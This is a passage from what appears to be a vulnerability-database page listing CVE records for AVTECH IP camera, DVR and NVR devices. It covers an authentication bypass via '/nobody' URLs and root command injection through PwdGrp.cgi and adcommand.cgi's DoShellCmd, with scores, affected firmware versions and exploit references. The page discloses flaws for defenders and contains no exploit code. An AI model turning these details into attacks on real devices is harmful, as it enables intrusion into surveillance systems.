Affected: 1000C-1000C-1000C-1000C Affected: 1001-1000-1000-1000 Affected: 1001-1001-1000-1000 Affected: 1002-1000-1000-1000 Affected: 1002-1002-1000-1002 Affected: 1002D-1000D-1000D-1000D Affected: 1003-1000-1000-1001 Affected: 1003-1001-1001-1000 Affected: 1003-1002-1001-1000 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1002-1000-1001 Affected: 1004-1003-1001-1002 Affected: 1004-1003-1002-1001 Affected: 1004A-1001A-1002A-1000A Affected: 1005-1002-1001-1002 Affected: 1005-1003-1001-1002 Affected: 1005-1004-1002-1001 Affected: 1005A-1001A-1002A-1001A Affected: 1005D-1001D-1002D-1001D Affected: 1006-1002-1001-1002 Affected: 1006-1003-1001-1001 Affected: 1006-1004-1003-1001 Affected: 1007-1001-1003-1001 Affected: 1007-1001-1004-1003 Affected: 1007-1002-1001-1000 Affected: 1007-1002-1001-1003 Affected: 1007-1002-1003-1002 Affected: 1007-1004-1003-1001 Affected: 1008-1001-1003-1002 Affected: 1008-1004-1004-1001 Affected: 1008D-1003D-1004D-1002D Affected: 1008J-1004J-1004J-1001J Affected: 1009-1001-1004-1001 Affected: 1009-1002-1005-1003 Affected: 1009-1003-1001-1003 Affected: 1009-1003-1005-1002 Affected: 1010-1001-1004-1001 Affected: 1010-1001-1004-1002 Affected: 1010-1003-1005-1002 Affected: 1010-1003-1006-1003 Affected: 1010-1003-1006-1004 Affected: 1010-1004-1007-1001 Affected: 1010J-1001J-1004J-1001J Affected: 1010N-1003N-1005N-1002N Affected: 1011-1001-1002A-1002 Affected: 1011-1001-1002D-1002 Affected: 1011-1001-1003-1002 Affected: 1011-1001-1004-1002 Affected: 1011-1001-1005-1002 Affected: 1011-1004-1005-1002 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34065",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:35:32.244766Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:36:04.496Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi",
"username parameter",
"queryb64str"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1000-1000-1000-1000"
},
{
"status": "affected",
"version": "1000C-1000C-1000C-1000C"
},
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1002-1000-1002"
},
{
"status": "affected",
"version": "1002D-1000D-1000D-1000D"
},
{
"status": "affected",
"version": "1003-1000-1000-1001"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1002-1000-1001"
},
{
"status": "affected",
"version": "1004-1003-1001-1002"
},
{
"status": "affected",
"version": "1004-1003-1002-1001"
},
{
"status": "affected",
"version": "1004A-1001A-1002A-1000A"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1003-1001-1002"
},
{
"status": "affected",
"version": "1005-1004-1002-1001"
},
{
"status": "affected",
"version": "1005A-1001A-1002A-1001A"
},
{
"status": "affected",
"version": "1005D-1001D-1002D-1001D"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1003-1001-1001"
},
{
"status": "affected",
"version": "1006-1004-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1004-1003"
},
{
"status": "affected",
"version": "1007-1002-1001-1000"
},
{
"status": "affected",
"version": "1007-1002-1001-1003"
},
{
"status": "affected",
"version": "1007-1002-1003-1002"
},
{
"status": "affected",
"version": "1007-1004-1003-1001"
},
{
"status": "affected",
"version": "1008-1001-1003-1002"
},
{
"status": "affected",
"version": "1008-1004-1004-1001"
},
{
"status": "affected",
"version": "1008D-1003D-1004D-1002D"
},
{
"status": "affected",
"version": "1008J-1004J-1004J-1001J"
},
{
"status": "affected",
"version": "1009-1001-1004-1001"
},
{
"status": "affected",
"version": "1009-1002-1005-1003"
},
{
"status": "affected",
"version": "1009-1003-1001-1003"
},
{
"status": "affected",
"version": "1009-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1001-1004-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1002"
},
{
"status": "affected",
"version": "1010-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1003-1006-1003"
},
{
"status": "affected",
"version": "1010-1003-1006-1004"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010J-1001J-1004J-1001J"
},
{
"status": "affected",
"version": "1010N-1003N-1005N-1002N"
},
{
"status": "affected",
"version": "1011-1001-1002A-1002"
},
{
"status": "affected",
"version": "1011-1001-1002D-1002"
},
{
"status": "affected",
"version": "1011-1001-1003-1002"
},
{
"status": "affected",
"version": "1011-1001-1004-1002"
},
{
"status": "affected",
"version": "1011-1001-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1002"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function allows unauthenticated access to any request containing \"/nobody\" in the URL, bypassing login controls."
}
],
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function allows unauthenticated access to any request containing \"/nobody\" in the URL, bypassing login controls."
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115 Authentication Bypass"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290 Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:18.570Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via /nobody URL Path",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34065",
"datePublished": "2025-07-01T14:47:23.621Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:18.570Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34056 (GCVE-0-2025-34056)
Vulnerability from nvd – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution
Summary
An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the PwdGrp.cgi endpoint, which handles user and group management operations. Authenticated users can supply input through the pwd or grp parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34056",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:34:24.733333Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:34:41.482Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"PwdGrp.cgi user/group configuration handler",
"pwd parameter",
"grp parameter"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the \u003ccode\u003ePwdGrp.cgi\u003c/code\u003e endpoint, which handles user and group management operations. Authenticated users can supply input through the \u003ccode\u003epwd\u003c/code\u003e or \u003ccode\u003egrp\u003c/code\u003e parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges."
}
],
"value": "An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the PwdGrp.cgi endpoint, which handles user and group management operations. Authenticated users can supply input through the pwd or grp parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:17.710Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34056",
"datePublished": "2025-07-01T14:46:52.800Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:17.710Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34055 (GCVE-0-2025-34055)
Vulnerability from nvd – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution
Summary
An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the adcommand.cgi endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the DoShellCmd operation, passing arbitrary input via the strCmd parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1001-1000-1000-1000
Affected: 1002-1000-1000-1000 Affected: 1002-1001-1001-1001 Affected: 1003-1000-1001-1000 Affected: 1003-1001-1001-1000 Affected: 1003-1001-1001-1001 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1001-1002-1000 Affected: 1004-1002-1001-1000 Affected: 1004V-1002V-1003V-1001V Affected: 1004Y-1002Y-1001EJ-1000Y Affected: 1005-1001-1002-1000 Affected: 1005-1002-1001-1002 Affected: 1005-1002-1002-1000 Affected: 1005-1002-1004-1001 Affected: 1006-1001-1003-1000 Affected: 1006-1001-1003-1003 Affected: 1006-1002-1001-1002 Affected: 1006-1002-1003-1000 Affected: 1006R-1002R-1001R-1002R Affected: 1007-1001-1003-1000 Affected: 1007-1001-1003-1003 Affected: 1007-1002-1004-1000 Affected: 1007-1003-1005-1001 Affected: 1007E-1003E-1005EJ-1001E Affected: 1007V-1003V-1005V-1001V Affected: 1008-1001-1001-1001 Affected: 1008-1002-1002-1003 Affected: 1008-1002-1005-1000 Affected: 1008-1003-1005-1003 Affected: 1008-1004-1003-1002 Affected: 1009-1001-1002-1001 Affected: 1009-1001-1004-1000 Affected: 1009-1003-1006-1001 Affected: 1009-1004-1005-1006 Affected: 1009-1004-1006-1003 Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1001-1003-1001 Affected: 1010-1001-1004-1005 Affected: 1010-1002-1005-1000 Affected: 1010-1004-1007-1001 Affected: 1010-1005-1005-1002 Affected: 1011-1002-1004-1001 Affected: 1011-1002-1006-1000 Affected: 1011-1005-1007EJ-1001 Affected: 1011-1005-1008-1002 Affected: 1012-1002-1004-1001 Affected: 1012-1002-1006-1005 Affected: 1012-1002-1007-1004 Affected: 1012-1003-1001-1005 Affected: 1012-1003-1005-1005 Affected: 1012-1004-1008-1008 Affected: 1012-1008-1009-1000-FFFF Affected: 1013-1002-1006-1005 Affected: 1013-1003-1005-1001 Affected: 1013-1004-1008-1003 Affected: 1013-1004-1008-1008 Affected: 1014-1002-1007-1004 Affected: 1014-1003-1006-1001 Affected: 1014-1003-1006PL-1001 Affected: 1014-1003-1007-1001 Affected: 1014-1004-1008-1008 Affected: 1014-1005-1009-1002 Affected: 1014-1007-1009-1001 Affected: 1014L-1002L-1006L-1005L Affected: 1015-1006-1004-1002 Affected: 1015-1006-1005-1002 Affected: 1015-1006-1008-1002 Affected: 1015-1006-1008-1007 Affected: 1015-1006-1010-1003 Affected: 1015-1007-1007-1007 Affected: 1015K-1006K-1008PO-1002K Affected: 1015Y-1007Y-1010Y-1001Y Affected: 1016-1003-1007-1001 Affected: 1016-1004-1009-1009 Affected: 1016-1006-1008-1007 Affected: 1016-1007-1005-1001 Affected: 1016-1007-1009-1003 Affected: 1016-1007-1011-1001 Affected: 1016-1007-1011-1003 Affected: 1016-1008-1007-1007 Affected: 1016Y-1007Y-1011Y-1001Y Affected: 1017-1002-1008-1005 Affected: 1017-1003-1007-1002 Affected: 1017-1003-1008-1006 Affected: 1017-1008-1012-1002 Affected: 1017-1011-1013-1001-FFFF Affected: 1017k-1003k-1008k-1006k Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1003-1005-1004 Affected: 1018-1003-1007-1002 Affected: 1018-1003-1008-1003 Affected: 1018-1003-1008-1004 Affected: 1018-1003-1008PO-1003 Affected: 1018-1006-1009-1007 Affected: 1018-1007-1009-1003 Affected: 1018-1008-1012-1004 Affected: 1019-1003-1007-1002 Affected: 1019-1003-1008-1001 Affected: 1019-1004-1009-1007 Affected: 1019-1007-1009-1003 Affected: 1019-1009-1013-1003 Affected: 1019-1010-1009-1009 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1020-1003-1008-1003 Affected: 1020-1003-1008-1004 Affected: 1020-1003-1010-1006 Affected: 1020-1004-1009-1007 Affected: 1020-1005-1011-1010 Affected: 1020-1005-1012-1007 Affected: 1020-1007-1008-1003 Affected: 1020-1007-1009-1003 Affected: 1021-1003-1008-1003 Affected: 1021-1003-1008-1004 Affected: 1021-1005-1011-1010 Affected: 1021-1007-1010-1003 Affected: 1021L-1003L-1010L-1006L Affected: 1021r-1004r-1009r-1007r Affected: 1022-1003-1008-1002 Affected: 1022-1004-1009-1007 Affected: 1022-1007-1012-1007 Affected: 1022-1012-1011-1009 Affected: 1022-1014-1016-1002-FFFF Affected: 1022L-1004L-1011L-1006L Affected: 1022L-1005L-1011L-1010L Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1004-1010-1007 Affected: 1023-1014-1017-1002-FFFF Affected: 1025-1006-1013-1011 Affected: 1025-1008-1013-1008 Affected: 1025-1014-1013-1009 Affected: 1027-1008-1012-1008 Affected: 1027-1008-1013-1008 Affected: 1027-1014-1015-1009 Affected: 1027L-1006L-1015L-1009L Affected: 1028-1007-1014-1012 Affected: 1029-1007-1014-1008 Affected: 1030-1007-1014-1012 Affected: 1030-1008-1014-1008 Affected: 1031-1007-1015-1012 Affected: 1032-1007-1015-1008 Affected: 1032k-1007k-1015k-1008k Affected: 1036r-1008r-1016r-1009r Affected: 1037-1008-1017-1009 Affected: S749-S749-S749-S749 Affected: S820-S820-S820-S820 Affected: S823-S823-S823-S823 Affected: S855-S855-S855-S855 Affected: S914V-S914V-S914V-S914V Affected: S968-S968-S968-S968 Affected: S984-S984-S984-S984 Affected: T717-T717-T717-T717 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34055",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:33:10.541355Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:33:20.804Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"cgi-bin/supervisor/adcommand.cgi",
"strCmd within DoShellCmd"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1001-1001-1001"
},
{
"status": "affected",
"version": "1003-1000-1001-1000"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1001-1002-1000"
},
{
"status": "affected",
"version": "1004-1002-1001-1000"
},
{
"status": "affected",
"version": "1004V-1002V-1003V-1001V"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001EJ-1000Y"
},
{
"status": "affected",
"version": "1005-1001-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1002-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1004-1001"
},
{
"status": "affected",
"version": "1006-1001-1003-1000"
},
{
"status": "affected",
"version": "1006-1001-1003-1003"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1002-1003-1000"
},
{
"status": "affected",
"version": "1006R-1002R-1001R-1002R"
},
{
"status": "affected",
"version": "1007-1001-1003-1000"
},
{
"status": "affected",
"version": "1007-1001-1003-1003"
},
{
"status": "affected",
"version": "1007-1002-1004-1000"
},
{
"status": "affected",
"version": "1007-1003-1005-1001"
},
{
"status": "affected",
"version": "1007E-1003E-1005EJ-1001E"
},
{
"status": "affected",
"version": "1007V-1003V-1005V-1001V"
},
{
"status": "affected",
"version": "1008-1001-1001-1001"
},
{
"status": "affected",
"version": "1008-1002-1002-1003"
},
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1008-1003-1005-1003"
},
{
"status": "affected",
"version": "1008-1004-1003-1002"
},
{
"status": "affected",
"version": "1009-1001-1002-1001"
},
{
"status": "affected",
"version": "1009-1001-1004-1000"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009-1004-1005-1006"
},
{
"status": "affected",
"version": "1009-1004-1006-1003"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1001-1003-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1005"
},
{
"status": "affected",
"version": "1010-1002-1005-1000"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010-1005-1005-1002"
},
{
"status": "affected",
"version": "1011-1002-1004-1001"
},
{
"status": "affected",
"version": "1011-1002-1006-1000"
},
{
"status": "affected",
"version": "1011-1005-1007EJ-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1012-1002-1004-1001"
},
{
"status": "affected",
"version": "1012-1002-1006-1005"
},
{
"status": "affected",
"version": "1012-1002-1007-1004"
},
{
"status": "affected",
"version": "1012-1003-1001-1005"
},
{
"status": "affected",
"version": "1012-1003-1005-1005"
},
{
"status": "affected",
"version": "1012-1004-1008-1008"
},
{
"status": "affected",
"version": "1012-1008-1009-1000-FFFF"
},
{
"status": "affected",
"version": "1013-1002-1006-1005"
},
{
"status": "affected",
"version": "1013-1003-1005-1001"
},
{
"status": "affected",
"version": "1013-1004-1008-1003"
},
{
"status": "affected",
"version": "1013-1004-1008-1008"
},
{
"status": "affected",
"version": "1014-1002-1007-1004"
},
{
"status": "affected",
"version": "1014-1003-1006-1001"
},
{
"status": "affected",
"version": "1014-1003-1006PL-1001"
},
{
"status": "affected",
"version": "1014-1003-1007-1001"
},
{
"status": "affected",
"version": "1014-1004-1008-1008"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1014-1007-1009-1001"
},
{
"status": "affected",
"version": "1014L-1002L-1006L-1005L"
},
{
"status": "affected",
"version": "1015-1006-1004-1002"
},
{
"status": "affected",
"version": "1015-1006-1005-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1007"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1015-1007-1007-1007"
},
{
"status": "affected",
"version": "1015K-1006K-1008PO-1002K"
},
{
"status": "affected",
"version": "1015Y-1007Y-1010Y-1001Y"
},
{
"status": "affected",
"version": "1016-1003-1007-1001"
},
{
"status": "affected",
"version": "1016-1004-1009-1009"
},
{
"status": "affected",
"version": "1016-1006-1008-1007"
},
{
"status": "affected",
"version": "1016-1007-1005-1001"
},
{
"status": "affected",
"version": "1016-1007-1009-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1016-1008-1007-1007"
},
{
"status": "affected",
"version": "1016Y-1007Y-1011Y-1001Y"
},
{
"status": "affected",
"version": "1017-1002-1008-1005"
},
{
"status": "affected",
"version": "1017-1003-1007-1002"
},
{
"status": "affected",
"version": "1017-1003-1008-1006"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017-1011-1013-1001-FFFF"
},
{
"status": "affected",
"version": "1017k-1003k-1008k-1006k"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1003-1005-1004"
},
{
"status": "affected",
"version": "1018-1003-1007-1002"
},
{
"status": "affected",
"version": "1018-1003-1008-1003"
},
{
"status": "affected",
"version": "1018-1003-1008-1004"
},
{
"status": "affected",
"version": "1018-1003-1008PO-1003"
},
{
"status": "affected",
"version": "1018-1006-1009-1007"
},
{
"status": "affected",
"version": "1018-1007-1009-1003"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1003-1007-1002"
},
{
"status": "affected",
"version": "1019-1003-1008-1001"
},
{
"status": "affected",
"version": "1019-1004-1009-1007"
},
{
"status": "affected",
"version": "1019-1007-1009-1003"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019-1010-1009-1009"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1020-1003-1008-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1004"
},
{
"status": "affected",
"version": "1020-1003-1010-1006"
},
{
"status": "affected",
"version": "1020-1004-1009-1007"
},
{
"status": "affected",
"version": "1020-1005-1011-1010"
},
{
"status": "affected",
"version": "1020-1005-1012-1007"
},
{
"status": "affected",
"version": "1020-1007-1008-1003"
},
{
"status": "affected",
"version": "1020-1007-1009-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1004"
},
{
"status": "affected",
"version": "1021-1005-1011-1010"
},
{
"status": "affected",
"version": "1021-1007-1010-1003"
},
{
"status": "affected",
"version": "1021L-1003L-1010L-1006L"
},
{
"status": "affected",
"version": "1021r-1004r-1009r-1007r"
},
{
"status": "affected",
"version": "1022-1003-1008-1002"
},
{
"status": "affected",
"version": "1022-1004-1009-1007"
},
{
"status": "affected",
"version": "1022-1007-1012-1007"
},
{
"status": "affected",
"version": "1022-1012-1011-1009"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022L-1004L-1011L-1006L"
},
{
"status": "affected",
"version": "1022L-1005L-1011L-1010L"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1004-1010-1007"
},
{
"status": "affected",
